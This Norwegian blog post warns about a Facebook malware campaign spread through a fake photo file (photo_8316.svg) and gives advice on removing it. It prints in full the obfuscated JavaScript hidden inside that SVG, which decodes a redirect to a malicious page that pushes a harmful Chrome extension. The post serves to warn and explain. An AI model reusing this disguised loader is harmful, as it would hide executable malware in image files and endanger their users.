Facebook foto chat virus

facebookNå begynner en ny type skadevare og spres på Facebook. Det starter med at noen som er infisert får en melding med en fil de må åpne. Jeg skal få analysert hele denne svindelen.

Jeg sier alltid at det ikke er virus før det motsatte er bevist. Det gjør jeg her også. Det første jeg gjør det er å analysere bildefilen photo_8316.svg. Jeg bruker virustotal som er en gratis virusscanner motor på internet. Den er det google som har laget og her scanner du filer og linker fra internet med opptil 54 viruscanne motorer fra mange selskaper. Det jeg finner her er heller mindre god lesing.

skjermbilde

Som du ser så får jeg treff på 11 virusmotorer. Jeg tar en sjekk på Trojan JS. Nemucod. CX Den har hatt stor spredning før, men er vel på vei opp igjen nå.  Det som skjer når du trykker på bildefilen. Så kjøres det ett javascript på din pc. Det er all koden som du ser under her:

 

<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN”
“http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd”>
<svg version=”1.1″ xmlns=”http://www.w3.org/2000/svg”>
<circle cx=”250″ cy=”250″ r=”50″ fill=”red” />
<script type=”text/javascript”><![CDATA[
function jzvxu(ovdyen,xbcat,emgls){
var qxfbj = “ep.Z/1Jzj9kgENc_XKByPdbRsiM85YU3fSnTHAx4lv=r07OVt:hC?FL6muoI2GDa”;
var ljbid = [“oj5\/1c09:ze.RU_B6ZIECgbV3lkTiKfM8JAvYdL=FmNSuGhHs7?OxDy42ntaprXP”,”oKaGJYVTkfbvx1.sUrDL6tMndjSH:2gP08O=Zcpu359z_Iy?ihAeN7\/C4lRFBmEX”,”rXJgPI2C6\/G=:_b5AO41hBNf8ZsoLMDY90V3?UaxSmHtiEjnl.kezp7TcvyudRFK”,”ipjfYsGd326HzUurB1\/at?AkCV0TSlcg8hnI5R9ZPvM_Db7.L4EymONXKJxo=:eF”,”=PN4ec5gAuymXlfhSJ7H?sjRFL0Mki3ETrnGO8b6pCBUo_9KV1vZz.2:dItxD\/Ya”,”L29_cyi4zp5:0ZM=7AKBaf3Ft1sPIebh\/SRvEYOmJoVD6xdlCH?rgGnN8kuTXUj.”,”03bEzUjT4IRh\/pu.t2P7JKHiX8ny65LldYFmG?O=V9gaoMAe:Sr1f_ZcvBDkNxCs”];
var xzdvdq = “”;
var bszclj = 0;
while(ljbid[bszclj]){
bszclj++;
}
var synjv = 0;
while(ovdyen[synjv]){
var dloriu = 0;
var newpn = -1;
while(qxfbj[dloriu]){
if(qxfbj[dloriu] == ovdyen[synjv]){
newpn = dloriu;
break;
}
dloriu++;
}
if(newpn >= 0){
var dlkzpk = 0;
var xltllh = -1;
while(ljbid[synjv%bszclj][dlkzpk]){
if(ljbid[synjv%bszclj][dlkzpk] == ovdyen[synjv]){
xltllh = dlkzpk;
break;
}
dlkzpk++;
}
xzdvdq += qxfbj[xltllh];
}else{
xzdvdq += ovdyen[synjv];
}
synjv++;
}
var phiav = “”;
for(vmlrh=xbcat;vmlrh<xzdvdq.length;vmlrh++){
phiav += xzdvdq[vmlrh];
}
xzdvdq = phiav;
return xzdvdq;
}
var pritrj = window;
var gulrp = jzvxu(“tlN_j/4liyp”,8,false);
var dlmgvp = jzvxu(“sRN?U?Vt.KLLuF”,6,true);
var aebvqq = jzvxu(“wv=EULd”,3,false);
pritrj[gulrp][dlmgvp][aebvqq] = jzvxu(“oiGKvC:jhPYtMBFl9JvkRtaZLI2bjwPpv2zszvCV93?K”,4,true);
]]></script>
</svg>

 

Da blir alt dette over installert, men det stopper ikke der. Her er også mye av koden kryptert og det er uleselig. Når du har kjørt filen så kommer du videre til en nettside som ber dere installere en plugin i Google Chrome.

skjermbilde

Når du installerer denne pluginen i Google Chrome er du med på å spre dette videre på Facebook. Dette er en av de verre Facebook virus jeg har vært borti til nå. Video vil du aldri få se desverre.

Vanligvis så kan man fjerne en plugin i Google Chrome også er alt fint, men ikke her.

  1. Her får du flere virus og trojanere installert på pc.
  2. Her får du også installert skadevare i Chrome.

Så her må du bruke flere programmer for få dette fjernet. Jeg anbefaler antivirus og antimalware.

Du må også tilbakestille Google Chrome for å renske opp i nettleseren. Det gjøres under avanserte instillinger.

For å bli infisert så må du gjøre følgene:

  1. Trykke på filen i melding
  2. Kjøre den
  3. Få installert virus på pc
  4. Gå til falsk videoside i Google Chrome
  5. Installere Chrome utvidelse

Så dette hopper ikke inn i pc`en av seg selv. Her  tar nyskjerrigheten din overhånd.

Men dette er mer farlige saker. Har du fått dette på din pc og facebook konto.

Bytt passord på Facebook konto og scann pc for skadevare med en gang.

Jeg har kun fått testet dette viruset på Windows 10. Så jeg vet ikke åssen det spres på mac, iphone eller andre windows varianter.